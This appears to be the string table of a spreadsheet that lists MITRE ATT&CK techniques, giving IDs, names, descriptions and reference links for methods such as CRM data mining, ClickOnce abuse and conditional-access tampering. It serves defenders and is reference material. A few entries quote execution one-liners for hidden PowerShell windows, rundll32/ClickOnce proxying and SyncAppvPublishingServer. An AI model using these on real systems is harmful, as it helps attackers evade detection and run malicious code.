    <t>Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
https://attack.mitre.org/techniques/T1213/004</t>
  </si>
  <si>
    <t>T1546.015</t>
  </si>
  <si>
    <t>Component Object Model Hijacking</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1546/015</t>
  </si>
  <si>
    <t>T1589.001</t>
  </si>
  <si>
    <t>Credentials</t>
  </si>
  <si>
    <t>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(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)
Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.). Adversaries may purchase credentials from dark web markets, such as Russian Market and 2easy, or through access to Telegram channels that distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer Stealer Logs 2023)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https://attack.mitre.org/techniques/T1589/001</t>
  </si>
  <si>
    <t>T1195.002</t>
  </si>
  <si>
    <t>Compromise Software Supply Chain</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1195/002</t>
  </si>
  <si>
    <t>T1036.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1036/003</t>
  </si>
  <si>
    <t>T1102.002</t>
  </si>
  <si>
    <t>Bidirectional Communication</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1102/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1203</t>
  </si>
  <si>
    <t>T1595.003</t>
  </si>
  <si>
    <t>Wordlist Scanning</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1595/003</t>
  </si>
  <si>
    <t>T1562.011</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1562/011</t>
  </si>
  <si>
    <t>T1137.004</t>
  </si>
  <si>
    <t>Outlook Home Page</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1137/004</t>
  </si>
  <si>
    <t>T1573.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1573/002</t>
  </si>
  <si>
    <t>T1567.002</t>
  </si>
  <si>
    <t>Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1567/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1570</t>
  </si>
  <si>
    <t>T1574.009</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1574/009</t>
  </si>
  <si>
    <t>T1608.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1608/003</t>
  </si>
  <si>
    <t>T1037.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1037/005</t>
  </si>
  <si>
    <t>T1614.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1614/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1095</t>
  </si>
  <si>
    <t>T1027.003</t>
  </si>
  <si>
    <t>Steganography</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1027/003</t>
  </si>
  <si>
    <t>T1584.002</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</si>
  <si>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
https://attack.mitre.org/techniques/T1584/002</t>
  </si>
  <si>
    <t>T1001.003</t>
  </si>
  <si>
    <t>Protocol or Service Impersonation</t>
  </si>
  <si>
    <t>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Adversaries may also leverage legitimate protocols to impersonate expected web traffic or trusted services. For example, adversaries may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted data to disguise C2 communications or mimic legitimate services such as Gmail, Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation: Malleable-C2-U42)
https://attack.mitre.org/techniques/T1001/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1012</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
https://attack.mitre.org/techniques/T1030</t>
  </si>
  <si>
    <t>T1550.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1550/004</t>
  </si>
  <si>
    <t>T1078.002</t>
  </si>
  <si>
    <t>Domain Accounts</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</si>
  <si>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
https://attack.mitre.org/techniques/T1078/002</t>
  </si>
  <si>
    <t>T1218.009</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1218/009</t>
  </si>
  <si>
    <t>T1553.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1553/004</t>
  </si>
  <si>
    <t>T1037.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1037/003</t>
  </si>
  <si>
    <t>T1499</t>
  </si>
  <si>
    <t>Endpoint Denial of Service</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</si>
  <si>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https://attack.mitre.org/techniques/T1499</t>
  </si>
  <si>
    <t>T1027.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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ilasm.exe(Citation: ATTACK IQ),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
https://attack.mitre.org/techniques/T1027/004</t>
  </si>
  <si>
    <t>T1614</t>
  </si>
  <si>
    <t>System Location Discovery</t>
  </si>
  <si>
    <t>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
https://attack.mitre.org/techniques/T1614</t>
  </si>
  <si>
    <t>T1564.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1564/007</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>BITS Jobs</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</si>
  <si>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
https://attack.mitre.org/techniques/T1197</t>
  </si>
  <si>
    <t>T1127.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1127/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1656</t>
  </si>
  <si>
    <t>T1578.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1578/005</t>
  </si>
  <si>
    <t>T1090.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1090/004</t>
  </si>
  <si>
    <t>T1557.002</t>
  </si>
  <si>
    <t>ARP Cache Poisoning</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1557/002</t>
  </si>
  <si>
    <t>T1562.008</t>
  </si>
  <si>
    <t>Disable or Modify Cloud Logs</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</si>
  <si>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
https://attack.mitre.org/techniques/T1562/008</t>
  </si>
  <si>
    <t>T1518.001</t>
  </si>
  <si>
    <t>Security Software Discovery</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1518/001</t>
  </si>
  <si>
    <t>T1564.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)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Similarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is &lt;code&gt;powershell.exe -WindowStyle Hidden&lt;/code&gt;.(Citation: PowerShell About 2019)
In addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding &lt;code&gt;explorer.exe&lt;/code&gt; process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack)  All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows.
https://attack.mitre.org/techniques/T1564/003</t>
  </si>
  <si>
    <t>T1127.002</t>
  </si>
  <si>
    <t>ClickOnce</t>
  </si>
  <si>
    <t>Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
https://attack.mitre.org/techniques/T1127/002</t>
  </si>
  <si>
    <t>T1059.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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executables.(Citation: Zscaler APT31 Covid-19 October 2020)
Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.
https://attack.mitre.org/techniques/T1059/006</t>
  </si>
  <si>
    <t>T1070.010</t>
  </si>
  <si>
    <t>Relocate Malware</t>
  </si>
  <si>
    <t>Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
https://attack.mitre.org/techniques/T1070/010</t>
  </si>
  <si>
    <t>T1591.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1591/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1132</t>
  </si>
  <si>
    <t>T1546.010</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/010</t>
  </si>
  <si>
    <t>T1598</t>
  </si>
  <si>
    <t>Phishing for Information</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</si>
  <si>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
https://attack.mitre.org/techniques/T1598</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>Resource Hijacking</t>
  </si>
  <si>
    <t>Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. 
Resource hijacking may take a number of different forms. For example, adversaries may:
* Leverage compute resources in order to mine cryptocurrency
* Sell network bandwidth to proxy networks
* Generate SMS traffic for profit
* Abuse cloud-based messaging services to send large quantities of spam messages
In some cases, adversaries may leverage multiple types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking 2023)
https://attack.mitre.org/techniques/T1496</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</si>
  <si>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</si>
  <si>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</si>
  <si>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 In addition, establishing accounts may allow adversaries to abuse free services, such as registering for trial periods to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for malicious purposes.(Citation: Free Trial PurpleUrchin)
https://attack.mitre.org/techniques/T1585</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1588</t>
  </si>
  <si>
    <t>T1546.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/002</t>
  </si>
  <si>
    <t>T1556.009</t>
  </si>
  <si>
    <t>Conditional Access Policies</t>
  </si>
  <si>
    <t>Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource.
For example, in Entra ID, Okta, and JumpCloud, users can be denied access to applications based on their IP address, device enrollment status, and use of multi-factor authentication.(Citation: Microsoft Conditional Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional Access Policies) In some cases, identity providers may also support the use of risk-based metrics to deny sign-ins based on a variety of indicators. In AWS and GCP, IAM policies can contain `condition` attributes that verify arbitrary constraints such as the source IP, the date the request was made, and the nature of the resources or regions being requested.(Citation: AWS IAM Conditions)(Citation: GCP IAM Conditions) These measures help to prevent compromised credentials from resulting in unauthorized access to data or resources, as well as limit user permissions to only those required. 
By modifying conditional access policies, such as adding additional trusted IP ranges, removing [Multi-Factor Authentication](https://attack.mitre.org/techniques/T1556/006) requirements, or allowing additional [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535), adversaries may be able to ensure persistent access to accounts and circumvent defensive measures.
https://attack.mitre.org/techniques/T1556/009</t>
  </si>
  <si>
    <t>T1578.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1578/002</t>
  </si>
  <si>
    <t>T1555.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1555/006</t>
  </si>
  <si>
    <t>T1213.003</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</si>
  <si>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[Unsecured Credentials](https://attack.mitre.org/techniques/T1552)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
https://attack.mitre.org/techniques/T1213/003</t>
  </si>
  <si>
    <t>T1565.002</t>
  </si>
  <si>
    <t>Transmitted Data Manipulation</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</si>
  <si>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https://attack.mitre.org/techniques/T1565/002</t>
  </si>
  <si>
    <t>T1003.008</t>
  </si>
  <si>
    <t>/etc/passwd and /etc/shadow</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1003/008</t>
  </si>
  <si>
    <t>T1543.001</t>
  </si>
  <si>
    <t>Launch Agent</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1543/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1569</t>
  </si>
  <si>
    <t>T1059.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1059/003</t>
  </si>
  <si>
    <t>T1055.009</t>
  </si>
  <si>
    <t>Proc Memory</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1650</t>
  </si>
  <si>
    <t>T1601.001</t>
  </si>
  <si>
    <t>Patch System Image</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1601/001</t>
  </si>
  <si>
    <t>T1558.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1558/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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such as Credential Access, Lateral Movement, or Defense Evasion, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).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 Contact or other sensitive information about business partners and customers, including personally identifiable information (PII) 
Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include the following:
* Storage services such as IaaS databases, enterprise databases, and more specialized platforms such as customer relationship management (CRM) databases 
* Collaboration platforms such as SharePoint, Confluence, and code repositories
* Messaging platforms such as Slack and Microsoft Teams 
In some cases, information repositories have been improperly secured, typically by unintentionally allowing for overly-broad access by all users or even public access to unauthenticated users. This is particularly common with cloud-native or cloud-hosted services, such as AWS Relational Database Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)
https://attack.mitre.org/techniques/T1213</t>
  </si>
  <si>
    <t>T1070.009</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1070/009</t>
  </si>
  <si>
    <t>T1555.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1555/004</t>
  </si>
  <si>
    <t>T1036.010</t>
  </si>
  <si>
    <t>Masquerade Account Name</t>
  </si>
  <si>
    <t>Adversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign. This will typically occur during [Create Account](https://attack.mitre.org/techniques/T1136), although accounts may also be renamed at a later date. This may also coincide with [Account Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first deletes an account before re-creating one with the same name.(Citation: Huntress MOVEit 2023)
Often, adversaries will attempt to masquerade as service accounts, such as those associated with legitimate software, data backups, or container cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec Kubernetes Attack 2023) They may also give accounts generic, trustworthy names, such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware 2024) Sometimes adversaries may model account names off of those already existing in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).  
Note that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656), which describes impersonating specific trusted individuals or organizations, rather than user or service account names.
https://attack.mitre.org/techniques/T1036/010</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>Hardware Additions</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</si>
  <si>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
https://attack.mitre.org/techniques/T1200</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1505</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</si>
  <si>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</si>
  <si>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</si>
  <si>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objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
https://attack.mitre.org/techniques/T1485</t>
  </si>
  <si>
    <t>T1132.002</t>
  </si>
  <si>
    <t>Non-Standard Encoding</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1132/002</t>
  </si>
  <si>
    <t>T1556.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1556/001</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.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interfaces.(Citation: TLDRSec AWS Attacks)
Adversaries may also use cloud-native mechanisms to share victim data with adversary-controlled cloud accounts, such as creating anonymous file sharing links or, in Azure, a shared access signature (SAS) URI.(Citation: Microsoft Azure Storage Shared Access Signature)
Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018)
https://attack.mitre.org/techniques/T1537</t>
  </si>
  <si>
    <t>T1027.006</t>
  </si>
  <si>
    <t>HTML Smuggling</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</si>
  <si>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
https://attack.mitre.org/techniques/T1027/006</t>
  </si>
  <si>
    <t>T1556.005</t>
  </si>
  <si>
    <t>Reversible Encryption</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</si>
  <si>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
https://attack.mitre.org/techniques/T1556/005</t>
  </si>
  <si>
    <t>T1027.010</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1027/010</t>
  </si>
  <si>
    <t>T1070.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1070/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1189</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1498</t>
  </si>
  <si>
    <t>T1651</t>
  </si>
  <si>
    <t>Cloud Administration Command</t>
  </si>
  <si>
    <t>Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)
https://attack.mitre.org/techniques/T1651</t>
  </si>
  <si>
    <t>T1546.016</t>
  </si>
  <si>
    <t>Installer Packages</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</si>
  <si>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parti)(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts)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These installation routines may also include instructions to perform additional actions that may be abused by adversaries.(Citation: Microsoft Installation Procedures)
https://attack.mitre.org/techniques/T1546/016</t>
  </si>
  <si>
    <t>T1595.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1595/001</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>Template Injection</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</si>
  <si>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
https://attack.mitre.org/techniques/T1221</t>
  </si>
  <si>
    <t>T1037.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1037/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1134</t>
  </si>
  <si>
    <t>T1111</t>
  </si>
  <si>
    <t>Multi-Factor Authentication Interception</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</si>
  <si>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
https://attack.mitre.org/techniques/T1111</t>
  </si>
  <si>
    <t>T1027.002</t>
  </si>
  <si>
    <t>Software Packing</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1027/002</t>
  </si>
  <si>
    <t>T1584.007</t>
  </si>
  <si>
    <t>Adversaries may compromise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https://attack.mitre.org/techniques/T1584/007</t>
  </si>
  <si>
    <t>T1071.001</t>
  </si>
  <si>
    <t>Web Protocols</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1071/001</t>
  </si>
  <si>
    <t>T1059.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1059/005</t>
  </si>
  <si>
    <t>T1564.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1564/005</t>
  </si>
  <si>
    <t>T1543.002</t>
  </si>
  <si>
    <t>Systemd Service</t>
  </si>
  <si>
    <t>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The .service file’s User directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions.
https://attack.mitre.org/techniques/T1543/002</t>
  </si>
  <si>
    <t>T1563.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1563/002</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020)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
https://attack.mitre.org/techniques/T1136</t>
  </si>
  <si>
    <t>T1547.013</t>
  </si>
  <si>
    <t>XDG Autostart Entries</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</si>
  <si>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
https://attack.mitre.org/techniques/T1547/013</t>
  </si>
  <si>
    <t>T1584.004</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control.(Citation: TrendMicro EarthLusca 2022)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
https://attack.mitre.org/techniques/T1584/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Entra ID,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Microsoft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
https://attack.mitre.org/techniques/T1526</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1018</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>Network Service Discovery</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</si>
  <si>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
https://attack.mitre.org/techniques/T1046</t>
  </si>
  <si>
    <t>T1590.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1590/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Such software may be deployed widely across the environment for configuration management or security reasons, such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072), and may allow adversaries broad access to infect devices or move laterally.
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
https://attack.mitre.org/techniques/T1518</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1538</t>
  </si>
  <si>
    <t>T1055.005</t>
  </si>
  <si>
    <t>Thread Local Storage</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/005</t>
  </si>
  <si>
    <t>T1622</t>
  </si>
  <si>
    <t>Debugger Evasion</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</si>
  <si>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
https://attack.mitre.org/techniques/T1622</t>
  </si>
  <si>
    <t>T1036.006</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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1036/006</t>
  </si>
  <si>
    <t>T1547.007</t>
  </si>
  <si>
    <t>Re-opened Applications</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</si>
  <si>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
https://attack.mitre.org/techniques/T1547/007</t>
  </si>
  <si>
    <t>T1608.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)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
https://attack.mitre.org/techniques/T1608/006</t>
  </si>
  <si>
    <t>T1550.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1550/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1052</t>
  </si>
  <si>
    <t>T1574.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1574/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1105</t>
  </si>
  <si>
    <t>T1216.002</t>
  </si>
  <si>
    <t>SyncAppvPublishingServer</t>
  </si>
  <si>
    <t>Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V).(Citation: 1 - appv) For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally.(Citation: 2 - appv)(Citation: 3 - appv)
The SyncAppvPublishingServer.vbs script is legitimate, may be signed by Microsoft, and is commonly executed from `\System32` through the command line via `wscript.exe`.(Citation: 4 - appv)(Citation: 5 - appv)
Adversaries may abuse SyncAppvPublishingServer.vbs to bypass [PowerShell](https://attack.mitre.org/techniques/T1059/001) execution restrictions and evade defensive counter measures by "living off the land."(Citation: 6 - appv)(Citation: 4 - appv) Proxying execution may function as a trusted/signed alternative to directly invoking `powershell.exe`.(Citation: 7 - appv)
For example,  [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands may be invoked using:(Citation: 5 - appv)
`SyncAppvPublishingServer.vbs "n; {PowerShell}"`
https://attack.mitre.org/techniques/T1216/002</t>
  </si>
  <si>
    <t>T1098.002</t>
  </si>
  <si>
    <t>Additional Email Delegate Permissions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</si>
  <si>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Mandiant Defend UNC2452 White Paper)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
https://attack.mitre.org/techniques/T1098/002</t>
  </si>
  <si>
    <t>T1588.003</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</si>
  <si>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
https://attack.mitre.org/techniques/T1588/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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This is also possible in many cloud-based office application suites. For example, in Microsoft 365 environments, an adversary may create a Power Automate workflow that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace environments, they may instead create an Apps Script that exfiltrates a user's data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation: OWN-CERT Google App Script 2024)
https://attack.mitre.org/techniques/T1648</t>
  </si>
  <si>
    <t>T1548.006</t>
  </si>
  <si>
    <t>TCC Manipulation</t>
  </si>
  <si>
    <t>Adversaries can manipulate or abuse the Transparency, Consent, &amp; Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy &amp; Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
